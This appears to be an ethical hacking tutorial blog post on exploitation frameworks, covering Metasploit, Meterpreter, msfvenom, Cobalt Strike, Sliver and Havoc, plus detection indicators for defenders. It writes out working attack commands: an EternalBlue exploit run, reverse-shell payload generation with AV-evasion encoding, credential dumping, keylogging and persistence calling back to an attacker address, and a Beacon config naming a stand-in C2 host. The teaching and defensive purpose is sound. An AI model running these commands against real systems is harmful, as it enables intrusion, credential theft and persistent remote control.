Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike

avatar

Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike

leh-banner.jpg

What will I learn

  • What exploitation frameworks are and why professional pentesters use them instead of manual exploitation;
  • Metasploit architecture -- modules, payloads, encoders, and the msfconsole workflow;
  • Exploitation with Metasploit -- scanning, selecting exploits, configuring payloads, and post-exploitation;
  • Meterpreter -- the advanced payload that provides file system access, pivoting, keylogging, and persistence;
  • Cobalt Strike -- the commercial framework used by both red teams and APTs, and why it matters;
  • Sliver and Havoc -- open-source C2 alternatives gaining traction;
  • Payload generation with msfvenom -- creating standalone payloads for different platforms and scenarios;
  • Defense: detecting framework signatures, monitoring for beaconing, EDR evasion awareness.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Kali Linux or Metasploit installed;
  • Your hacking lab with vulnerable VMs (Metasploitable, DVWA);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 40 Exercises

Exercise 1: DNS enumeration comparison.

# Zone transfer (zonetransfer.me allows AXFR for education)
dig axfr zonetransfer.me @nsztm1.digi.ninja
# Found: 28 records including A, AAAA, CNAME, MX, TXT, SRV

# Subdomain brute force (gobuster)
gobuster dns -d zonetransfer.me -w /usr/share/wordlists/subdomains-top1million-5000.txt -t 50
# Found: 6 subdomains (www, mail, ftp, vpn, dev, staging)

# Certificate Transparency (crt.sh)
curl -s "https://crt.sh/?q=%.zonetransfer.me&output=json" | \
    python3 -c "import json,sys;[print(x['name_value']) for x in json.load(sys.stdin)]" | sort -u
# Found: 4 subdomains (some overlap with brute force)

# Comparison: AXFR revealed ALL records including internal IPs and
# SRV records that brute force and CT logs missed entirely.
# CT logs found wildcard entries brute force missed.
# Brute force found subdomains not in CT logs (no HTTPS cert).

The key takeaway from comparing these three methods is that no single technique gives you the complete picture. AXFR is the jackpot -- when it works, you get everything in a single query including internal IPs and service records that the other methods would never find. But AXFR is available on maybe 5-10% of targets. Certificate Transparency logs are passive (zero contact with the target) and reveal subdomains that have TLS certificates, including wildcard entries. Brute forcing catches subdomains that have no TLS certificate and are not in CT logs -- internal tools, development servers, admin panels that were never intended to be public-facing. Run all three, merge the results, and you have a substantially more complete map than any single method provides.

Exercise 2: DNS tunneling lab with iodine.

Throughput: ~45 kbps (1MB file took ~3 minutes)
Latency: 150-400ms per packet (vs 20ms direct)
Wireshark observation: massive volume of TXT queries to
  t.tunnel.mydomain.com with long hex-encoded subdomain labels
  (up to 200 chars per label). Very obvious in DNS logs.
ISP resolver: forwarded all queries (did not block).

The throughput numbers tell you exactly why DNS tunneling is the "last resort" channel, not the primary one. ~45 kbps is enough for command-and-control traffic (shell commands are tiny), credential exfiltration (a dumped SAM file is a few kilobytes), and slow data exfiltration -- but you are NOT transferring gigabytes through this. The latency is the real bottleneck for interactive sessions. Having said that, the fact that the ISP resolver forwarded everything without question demonstrates the fundamental problem: almost nobody inspects DNS content at the query level. The traffic is trivially detectable if you look for it (high-entropy subdomain labels, excessive query volume to one domain) but most organizations simply don't look.

Exercise 3: Subdomain takeover scanner.

#!/usr/bin/env python3
"""subtakeover.py -- scan for dangling CNAMEs"""
import dns.resolver
import requests
import sys

FINGERPRINTS = {
    'github.io': 'There isn\'t a GitHub Pages site here',
    'herokuapp.com': 'no-such-app',
    'amazonaws.com': 'NoSuchBucket',
    'azurewebsites.net': 'not found',
    'cloudfront.net': 'Bad request',
}

def check_subdomain(subdomain):
    try:
        answers = dns.resolver.resolve(subdomain, 'CNAME')
        cname = str(answers[0].target).rstrip('.')
        for service, fingerprint in FINGERPRINTS.items():
            if service in cname:
                try:
                    r = requests.get(f'http://{subdomain}', timeout=5)
                    if fingerprint.lower() in r.text.lower():
                        return cname, 'VULNERABLE'
                except requests.RequestException:
                    return cname, 'POSSIBLE (connection failed)'
        return cname, 'OK'
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return None, 'NXDOMAIN'
    except Exception:
        return None, 'ERROR'

with open(sys.argv[1]) as f:
    for line in f:
        sub = line.strip()
        cname, status = check_subdomain(sub)
        if status == 'VULNERABLE':
            print(f'[!] {sub} -> {cname} -- {status}')
        elif cname:
            print(f'[+] {sub} -> {cname} -- {status}')

The FINGERPRINTS dictionary is what makes this scanner work -- each cloud service has a distinctive error page when the resource doesn't exist. GitHub Pages returns "There isn't a GitHub Pages site here", S3 returns "NoSuchBucket", Heroku returns "no-such-app". If the CNAME points to one of these services AND the service returns the "not found" fingerprint, the subdomain is takeover-ready. In a real engagement you'd want to add more services (Shopify, Fastly, Pantheon, Surge.sh -- each with their own fingerprint) and add threading for speed. The subjack and nuclei tools we mentioned in episode 40 do exactly this, but at scale with hundreds of fingerprints and concurrent lookups.

Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike

Episode 40 covered DNS attacks -- the Kaminsky cache poisoning attack and why source port randomization was the internet's emergency response, DNS tunneling as the covert channel that firewalls almost never block, DNS hijacking through registrar compromise and dangling CNAME takeovers, DNS rebinding for attacking internal networks through a victim's browser, and building a DNS enumeration toolkit from scratch. You can now enumerate subdomains through passive and active techniques, understand why DNSSEC adoption remains incomplete after decades, and detect DNS tunneling through entropy analysis of query logs.

For 40 episodes now, we have been building individual attack skills. SQL injection, XSS, privilege escalation, lateral movement, cloud attacks, DNS poisoning -- each technique is a standalone weapon in your toolkit. And if you have been following along with the exercises, you can execute each one against a lab target from scratch. That's the foundation, and it matters.

But here's the thing that separates a vulnerability researcher from a professional penetration tester: in a real engagement, you don't have time to write custom Python scripts for every target. You have a scope, a timeline, and often hundreds of hosts to assess. You need to chain techniques together -- scan a network, identify vulnerable services, exploit them, establish persistence, pivot to internal segments, dump credentials, move laterally, and document everything for the report. Doing all of that manually, one script at a time, would take weeks. Exploitation frameworks compress that into days.

Here we go.

Why Frameworks Exist

Think about what we did in episode 34 (pivoting and lateral movement). We manually set up SSH tunnels, configured proxychains, ran tools through SOCKS proxies, established footholds on multiple machines. Each step required different tools, different configurations, different mental models. Now imagine doing that across a network with 500 hosts, 12 different operating systems, and a 2-week engagement timeline.

Exploitation frameworks are the platforms that tie everything together. They provide a unified interface for scanning, exploitation, post-exploitation, and reporting. Instead of writing custom scripts for every target, you use a framework that has pre-built modules for thousands of known vulnerabilities -- and those modules handle the boring parts (payload encoding, shellcode generation, session management, network routing) so you can focus on the actual assessment.

The three major frameworks you'll encounter:

  • Metasploit -- open source, the industry standard, what every pentest course teaches first
  • Cobalt Strike -- commercial ($5,900/year), the red team standard, unfortunately also the APT standard
  • Sliver -- open source, the modern alternative, built in Go, gaining serious traction

Metasploit -- The Industry Standard

Metasploit (https://github.com/rapid7/metasploit-framework) is the most widely used exploitation framework in existence. Open source, community-driven, with over 2,200 exploits and 1,300 post-exploitation modules. It was created by H.D. Moore in 2003 as a portable network tool, acquired by Rapid7 in 2009, and has been the backbone of penetration testing ever since.

Metasploit comes pre-installed on Kali Linux. If you set up your hacking lab back in episode 2, you already have it.

Architecture

The architecture is modular -- everything in Metasploit is organized into module types, and understanding these types is essential for using the framework effectively:

Metasploit Framework
|
+-- Exploits        (code that triggers a vulnerability)
|   +-- remote       (network-based: SMB, HTTP, FTP)
|   +-- local        (privilege escalation)
|   +-- client       (browser, document-based)
|
+-- Payloads         (code that runs AFTER exploitation)
|   +-- singles      (self-contained: exec, adduser)
|   +-- stagers      (small footprint, downloads the stage)
|   +-- stages       (the full payload: meterpreter, shell)
|
+-- Encoders         (evade signature detection)
+-- Nops             (padding for exploit reliability)
+-- Auxiliary        (scanners, fuzzers, brute forcers)
+-- Post             (post-exploitation modules)

The exploit/payload split is a key design decision. The exploit is the code that triggers the vulnerability and gives you execution on the target. The payload is the code that runs once the exploit succeeds. This separation means you can combine any exploit with any compatible payload -- use the same EternalBlue exploit to deliver a reverse shell, a Meterpreter session, a custom command, or just add a user account. Same vulnerability, different objectives, same framework.

The Metasploit Workflow

Every Metasploit engagement follows the same five-step pattern:

# Start msfconsole
msfconsole

# 1. SEARCH for a module
msf6> search type:exploit platform:windows smb

# 2. SELECT the module
msf6> use exploit/windows/smb/ms17_010_eternalblue

# 3. SHOW options
msf6> show options
# Required: RHOSTS (target), RPORT (445)
# Payload: windows/x64/meterpreter/reverse_tcp

# 4. CONFIGURE
msf6> set RHOSTS 192.168.1.50
msf6> set LHOST 10.10.14.5
msf6> set payload windows/x64/meterpreter/reverse_tcp

# 5. EXPLOIT
msf6> exploit

# [*] Sending stage...
# [*] Meterpreter session 1 opened

That is the entire workflow: search, select, configure, exploit. Five commands to go from "I know the target is running SMB" to "I have a shell." This is why frameworks exist -- they turn hours of manual work into minutes.

The search command is more powerful than most people realize. You can filter by type (exploit, auxiliary, post), platform (windows, linux, osx), CVE number (cve:2021-44228), author, date, and rank. The rank system (excellent, great, good, normal, average, low, manual) tells you how reliable the exploit is -- excellent and great rank exploits work consistently, manual rank means you're going to have to fiddle with it.

EternalBlue -- The Most Famous Exploit

MS17-010 (EternalBlue) is the exploit that powered WannaCry and NotPetya. It exploits a buffer overflow in Windows SMB (port 445) and gives you SYSTEM access remotely, without authentication. It was developed by the NSA, leaked by the Shadow Brokers in April 2017, and weaponized within weeks:

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.50
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 10.10.14.5
msf6> exploit

# [*] 192.168.1.50:445 - Connecting to target for exploitation
# [+] 192.168.1.50:445 - =-=-= WIN =-=-=
# [*] Meterpreter session 1 opened

meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo
# Computer: TARGETPC
# OS: Windows 10 (10.0 Build 14393)
# Architecture: x64

From zero to SYSTEM in 30 seconds. On any unpatched Windows machine with SMB exposed. This is why patching matters. EternalBlue was patched in March 2017 (MS17-010). WannaCry hit in May 2017. Every infected machine was at least two months behind on patches.

I bring up EternalBlue not just because it's historically important (though it is -- WannaCry caused an estimated $4 billion in damages globally and crippled the UK's National Health Service), but because it perfectly illustrates the power differential that frameworks create. The underlying vulnerability is a complex heap overflow in SMB's transaction processing. Writing an exploit for it from scratch requires deep knowledge of Windows kernel memory management, SMB protocol internals, and heap spraying techniques. Using the Metasploit module requires five commands and about 30 seconds. The framework abstracts away the complexity and makes the capability accessible to anyone who can type use and set ;-)

Meterpreter -- The Swiss Army Knife

Meterpreter is Metasploit's advanced payload, and it deserves its own section because it's the tool you'll spend most of your time in once you have a session. It runs entirely in memory (no files written to disk), communicates over encrypted channels, and provides an extensive command set for everything from file system access to keylogging to network pivoting:

# File system operations
meterpreter> ls
meterpreter> download C:\\Users\\admin\\Desktop\\secrets.docx
meterpreter> upload /tmp/tool.exe C:\\temp\\tool.exe
meterpreter> cat C:\\Users\\admin\\Desktop\\passwords.txt

# System information
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ps          # list processes
meterpreter> getpid      # current process ID

# Credential harvesting
meterpreter> hashdump    # dump SAM hashes
meterpreter> load kiwi   # load mimikatz extension
meterpreter> creds_all   # dump all credentials

# Network pivoting (this ties directly to episode 34)
meterpreter> ipconfig
meterpreter> route add 192.168.2.0 255.255.255.0 SESSION_ID
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Now connect to localhost:3389 to RDP the internal machine

# Persistence
meterpreter> run persistence -U -i 30 -p 4444 -r YOUR_IP
# Adds a registry run key that reconnects every 30 seconds

# Privilege escalation (episode 31-32 techniques, automated)
meterpreter> getsystem    # try multiple privesc techniques
meterpreter> migrate PID  # migrate to another process

# Keylogging
meterpreter> keyscan_start
meterpreter> keyscan_dump
meterpreter> keyscan_stop

# Screenshots and webcam
meterpreter> screenshot
meterpreter> webcam_snap

Notice how many of these commands map directly to techniques we covered in previous episodes. The hashdump and load kiwi commands do exactly what we did manually with Mimikatz in episode 33 (Active Directory attacks). The route add and portfwd commands automate the SSH tunneling and proxychaining we set up by hand in episode 34 (pivoting). The getsystem command tries multiple privilege escalation techniques from episodes 31-32 in sequence until one works. Meterpreter doesn't replace the knowledge -- if getsystem fails, you need to understand WHY and try manual techniques -- but it dramatically accelerates the standard workflow.

Meterpreter's in-memory execution is what makes it particularly dangerous from a defensive perspective. Traditional antivirus scans files on disk -- but Meterpreter never touches the disk. It injects directly into a running process's memory space. This is why behavioral detection (EDR -- Endpoint Detection and Response) replaced signature-based AV as the primary defense mechanism. You cannot detect what you cannot see on disk. EDR monitors process behavior: is this process spawning unexpected child processes? Is it calling suspicious API functions? Is it injecting code into other processes? Is it making network connections to unknown destinations? These behavioral patterns are what catch Meterpreter, not file signatures.

Payload Generation with msfvenom

msfvenom is Metasploit's standalone payload generator. It creates payloads outside of msfconsole -- executables, scripts, shellcode -- that you can deliver to a target through any means (phishing email, file upload vulnerability from episode 20, USB drop, social engineering from episode 8):

# Windows reverse TCP executable
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=10.10.14.5 LPORT=4444 \
    -f exe -o payload.exe
# Creates a 73KB executable that connects back to you

# Python reverse HTTPS stager
msfvenom -p python/meterpreter/reverse_https \
    LHOST=10.10.14.5 LPORT=443 \
    -f raw -o stager.py
# Creates a Python script -- cross-platform, no compilation needed

# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=10.10.14.5 LPORT=4444 \
    -f psh-cmd
# Outputs a PowerShell command you can paste into a shell

# Linux ELF binary
msfvenom -p linux/x64/meterpreter/reverse_tcp \
    LHOST=10.10.14.5 LPORT=4444 \
    -f elf -o backdoor

# With encoding (basic AV evasion)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=10.10.14.5 LPORT=4444 \
    -e x64/xor_dynamic -i 5 \
    -f exe -o encoded_payload.exe
# -e encoder, -i iterations

A word on encoding and evasion: the shikata_ga_nai encoder (and its relatives) were effective at evading signature-based AV in the early 2010s. Today, every AV vendor has signatures for Metasploit-encoded payloads regardless of how many encoding iterations you use. Encoding is NOT a reliable evasion technique against modern defenses. It will bypass some older AV engines, but any halfway decent EDR will catch it through behavioral analysis even if the static signature doesn't trigger. Real evasion requires custom loaders, process injection techniques, and payload obfuscation that goes far beyond what msfvenom's built-in encoders provide -- and that's a topic for a future episode.

Cobalt Strike -- The Red Team Standard

Cobalt Strike is the commercial exploitation framework used by professional red teams -- and unfortunately also by APTs and ransomware operators. It costs $5,900/year per user. Cracked versions are widely used by threat actors, which means that the tools built for legitimate security testing are the same tools used in real attacks. This dual-use reality is uncomfortable but important to understand.

Key concepts:

  • Beacon -- the payload/implant. Communicates back to the team server using HTTP, HTTPS, DNS, or SMB. Supports sleep timers (check in every 60 seconds, for example) that make detection harder. When Beacon sleeps, it generates zero network traffic -- there's nothing to detect until it wakes up and phones home.
  • Malleable C2 Profiles -- this is the feature that makes Cobalt Strike so effective for advanced red teams. You can customize the network traffic to make Beacon communications look like legitimate traffic. A well-crafted profile can make C2 traffic indistinguishable from Bing searches, Amazon API calls, or Microsoft update checks. The profile controls every aspect of the HTTP transaction: URI paths, headers, POST body encoding, cookie names, User-Agent strings.
  • Aggressor Script -- scripting language for automating workflows, chaining post-exploitation actions, and building custom attack chains
  • Team Server -- centralized server that multiple operators connect to simultaneously. This is what makes Cobalt Strike a team tool -- five operators can work on the same engagement, share sessions, coordinate actions, and see each other's progress in real-time.
# Cobalt Strike workflow (conceptual)
# 1. Generate payload (Beacon) with chosen C2 profile
# 2. Deliver to target (phishing, web exploit, etc.)
# 3. Beacon executes, phones home to Team Server
# 4. Operator interacts via the client GUI
# 5. Post-exploitation: hashdump, mimikatz, lateral movement
# 6. Pivot through network using Beacon's SMB and TCP pivots
# 7. All actions logged for the engagement report

Why Cobalt Strike matters for defenders: because real-world attackers use it. The CrowdStrike 2024 Global Threat Report found Cobalt Strike Beacons in roughly 15% of all intrusions they investigated. If you work in a SOC, you WILL encounter Cobalt Strike. Knowing what Beacon traffic looks like, what artifacts it leaves in memory and on disk (even Beacon leaves some -- named pipes, malleable profile artifacts, watermarks in the payload), and how C2 channels work is essential for detection.

Open-Source C2 Alternatives

The Cobalt Strike licensing cost ($5,900/year) and the ethical problems with cracked copies have driven adoption of open-source alternatives:

Sliver

Sliver (https://github.com/BishopFox/sliver) is the open-source answer to Cobalt Strike. Built in Go by Bishop Fox, it generates cross-platform implants and supports HTTP/HTTPS/DNS/mTLS/WireGuard transport:

# Start Sliver server
./sliver-server

# Generate implant
sliver> generate --mtls --os windows --arch amd64 --save /tmp/implant.exe

# Start listener
sliver> mtls --lport 8443

# After implant executes on target:
sliver> sessions
# ID  Transport  Remote Address       OS/Arch
# 1   mtls       192.168.1.50:49832   windows/amd64

sliver> use 1
sliver (IMPLANT)> whoami
sliver (IMPLANT)> ls
sliver (IMPLANT)> download C:\\secrets.txt
sliver (IMPLANT)> execute-assembly /path/to/Rubeus.exe kerberoast

The execute-assembly command is worth highlighting -- it runs .NET assemblies in memory on the target, which means you can use the entire arsenal of .NET offensive tools (Rubeus for Kerberos attacks, Seatbelt for enumeration, SharpHound for BloodHound collection) without dropping executables to disk. This is the same in-memory execution concept that makes Meterpreter dangerous, applied to the .NET ecosystem.

Havoc

Havoc (https://github.com/HavocFramework/Havoc) is a newer framework with a modern GUI, its Demon agent (the implant), and extensive evasion capabilities. It is positioning itself as the free Cobalt Strike -- team server, multiple operators, sleep/jitter, malleable profiles. Still maturing but gaining traction in the red team community.

Auxiliary Modules -- Beyond Exploitation

Metasploit is not just about exploits. Auxiliary modules handle reconnaissance, scanning, and brute forcing -- the pre-exploitation phase that feeds targets into the exploitation phase:

# SMB version scanner -- map what's running SMB on the network
msf6> use auxiliary/scanner/smb/smb_version
msf6> set RHOSTS 192.168.1.0/24
msf6> run

# SSH brute force (episode 7 -- passwords)
msf6> use auxiliary/scanner/ssh/ssh_login
msf6> set RHOSTS 192.168.1.50
msf6> set USERNAME root
msf6> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6> run

# HTTP directory scanner
msf6> use auxiliary/scanner/http/dir_scanner
msf6> set RHOSTS 192.168.1.50
msf6> run

# Vulnerability scanner (check for EternalBlue without exploiting)
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.1.0/24
msf6> run
# Shows which hosts are vulnerable WITHOUT sending the exploit
# This is critical for safe assessment -- check first, exploit
# only with explicit authorization

The distinction between auxiliary/scanner (check if vulnerable) and exploit/ (actually exploit it) matters enormuosly in professional engagements. Scanning a /24 network for EternalBlue-vulnerable hosts is assessment. Firing the exploit at all of them is exploitation, and it requires explicit scope authorization for each target. Frameworks make it easy to do both -- which is why understanding the legal and contractual boundaries (episode 26, the full web pentest methodology) is as important as understanding the technical capabilities.

Metasploit Database Integration

For larger engagements, Metasploit integrates with PostgreSQL to track discovered hosts, services, vulnerabilities, and credentials across the entire assessment:

# Initialize the database
msfdb init
msfconsole

# Import nmap scan results into the database
msf6> db_nmap -sV -sC 192.168.1.0/24

# Query discovered hosts
msf6> hosts
# address         mac               name     os_name
# 192.168.1.1     aa:bb:cc:dd:ee:ff router   Linux
# 192.168.1.50    11:22:33:44:55:66 target1  Windows 10
# 192.168.1.100   99:88:77:66:55:44 target2  Ubuntu

# Query discovered services
msf6> services
# host            port  proto  name   state  info
# 192.168.1.50    445   tcp    smb    open   Windows 10
# 192.168.1.50    3389  tcp    rdp    open   Microsoft Terminal Services
# 192.168.1.100   22    tcp    ssh    open   OpenSSH 8.2
# 192.168.1.100   80    tcp    http   open   Apache 2.4.41

# Store harvested credentials
msf6> creds
# Shows all credentials discovered during the engagement
# password hashes, cleartext passwords, SSH keys, etc.

# Auto-exploit: find matching exploits for discovered services
msf6> vulns
# Cross-references services against the exploit database

This database-driven approach is what makes Metasploit practical for engagements larger than a single target. Scan 200 hosts, import the results, query for all hosts running vulnerable SMB versions, exploit them in sequence, store the credentials from each, use those credentials to pivot further. The database tracks everything, and it becomes the basis for the final report. Without it, you're juggling terminal windows and text files -- which is exactly what we were doing in earlier episodes, and it doesn't scale.

Defense: Detecting Exploitation Frameworks

From the blue team perspective, exploitation frameworks leave distinctive fingerprints -- if you know where to look:

# 1. Metasploit/Meterpreter indicators
# - Default Meterpreter stager ports: 4444, 4443
# - Meterpreter TLV (Type-Length-Value) protocol on the wire
# - Named pipes: \\.\pipe\msf* (default, configurable)
# - Default PE headers in generated payloads
# - Process injection into notepad.exe, svchost.exe (classic targets)
# - PowerShell with encoded commands (base64 payload delivery)

# 2. Cobalt Strike indicators
# - Default HTTPS certificate (serial number 146473198)
# - Beacon sleep/jitter patterns in network traffic
# - Named pipes: \\.\pipe\msagent_* (default, configurable)
# - Default watermark value in payloads (unique per license)
# - Team Server default port: 50050
# - Beacon configuration extractable from payload memory

# 3. Sliver indicators
# - mTLS certificate patterns
# - Implant naming conventions in process listing
# - HTTP C2 with specific URI patterns (configurable but often default)

# 4. Detection strategies
# - EDR that monitors process behavior, not just file signatures
# - Network detection: JA3/JA3S TLS fingerprinting
#   (each framework has a distinctive TLS client fingerprint)
# - Memory scanning for known shellcode patterns
# - YARA rules for framework-specific artifacts
# - DNS monitoring for C2 beaconing patterns
# - Anomalous process parent-child relationships
#   (why is Word spawning PowerShell spawning cmd.exe?)

# Practical detection: Cobalt Strike Beacon config extraction
# If you capture a Beacon payload in memory or on disk, you can
# extract its configuration (C2 servers, sleep time, watermark):

# Using SentinelOne's CobaltStrikeParser:
python3 parse_beacon_config.py --json suspected_beacon.bin
# Output:
# {
#   "BeaconType": "HTTPS",
#   "Port": 443,
#   "SleepTime": 60000,
#   "C2Server": "cdn-update.evil.com,/api/v2/update",
#   "UserAgent": "Mozilla/5.0 ...",
#   "Watermark": 305419896,
#   "PublicKey_MD5": "abc123..."
# }

# The watermark traces back to a specific Cobalt Strike license
# (or indicates a cracked copy if the watermark is known-bad)

The most reliable detection method across ALL frameworks is behavioral: look for anomalous process chains. A Word document spawning PowerShell, which spawns cmd.exe, which spawns a process that makes outbound connections to an unknown domain -- that is exploitation framework behavior regardless of which framework is being used. The specific indicators (named pipes, TLS fingerprints, port numbers) are useful but configurable. The behavioral pattern of "legitimate process doing illegitimate things" is much harder for the attacker to eliminate.

The AI Slop Connection

AI assistants are generating Metasploit commands for people who do not understand what they are running. Ask an AI "how do I hack a Windows machine" and you get step-by-step msfconsole instructions -- search, use, set, exploit -- without any context about authorization, scope, or consequences. The framework already lowers the bar from "deep vulnerability research" to "five commands." AI lowers it further from "five commands you understand" to "five commands you were told to type."

On the defensive side, AI-generated firewall rules and EDR policies routinely whitelist the exact ports and protocols that exploitation frameworks use. "Allow port 443 outbound for HTTPS" -- which is also the default Cobalt Strike Beacon transport and the Sliver HTTPS C2 channel. "Allow DNS on port 53" -- which is also the DNS C2 channel for Beacon and dnscat2 (as we covered in episode 40). The AI creates the hole and hands the attacker the key, because it doesn't understand that "allow HTTPS outbound" and "allow C2 traffic outbound" are the same rule when the C2 traffic is disguised as HTTPS.

The combination is what should concern you: AI makes it trivially easy to generate exploitation commands (lowering the attacker skill floor) while simultaneously making defensive configurations weaker (raising the defender skill ceiling needed to catch the mistakes). The gap between attack capability and defense capability widens -- and frameworks are the multiplier on the attack side.

The Bigger Picture

With this episode we're transitioning from "here's how individual attack techniques work" to "here's how professionals systematize those techniques at scale." Episodes 1-40 built the foundation -- you understand web vulnerabilties, network attacks, privilege escalation, cloud security, email and DNS protocol weaknesses. Now you understand the platforms that professional pentesters and red teams use to chain those techniques together into cohesive assessment workflows.

Having said that, frameworks are power tools -- and power tools in the hands of someone who doesn't understand the underlying mechanics are dangerous. If getsystem fails in Meterpreter, you need to understand the privilege escalation techniques from episodes 31-32 to troubleshoot manually. If Cobalt Strike's Malleable C2 profile gets detected, you need to understand the network protocols from episodes 3 and 11 to craft a better one. If Sliver's implant gets caught by EDR, you need to understand process injection and memory forensics to build something custom.

The frameworks accelerate what you already know. They don't replace knowing it. And the next phase of this series will go deeper into custom exploitation -- writing your own exploits, understanding the binary level, and building tools that don't have well-known signatures for defenders to match against. The frameworks are the starting point, not the destination.

Exercises

Exercise 1: Set up Metasploitable 2 or Metasploitable 3 in your lab. Use Metasploit to: (a) scan for vulnerabilities with db_nmap and auxiliary scanner modules, (b) exploit at least 3 different services (e.g., vsftpd backdoor, Samba, Tomcat), (c) for each exploitation, document the module used, the payload chosen, and what access level you obtained. Save your msfconsole history with spool /tmp/msf-lab.log.

Exercise 2: Generate 3 different Meterpreter payloads with msfvenom: (a) a Windows reverse TCP executable, (b) a Python reverse HTTPS stager, (c) a PowerShell one-liner. Scan each with VirusTotal (or a local AV scanner). Document: detection rate for each format, which AV engines detect them, and whether encoding with shikata_ga_nai reduces detections. This demonstrates why signature-based AV is insufficient against even the most well-known framework payloads.

Exercise 3: Install Sliver (https://github.com/BishopFox/sliver) and compare it against Metasploit. Generate implants for both, deliver to the same target VM. Document: (a) implant file size comparison, (b) detection rates (AV/EDR), (c) available post-exploitation commands, (d) ease of pivoting through the target to another network segment. Write your comparison to ~/lab-notes/msf-vs-sliver.md.

Bedankt en tot de volgende keer!

@scipio

stem stemsocial steemstem security programming
0
0
0.000
0 comments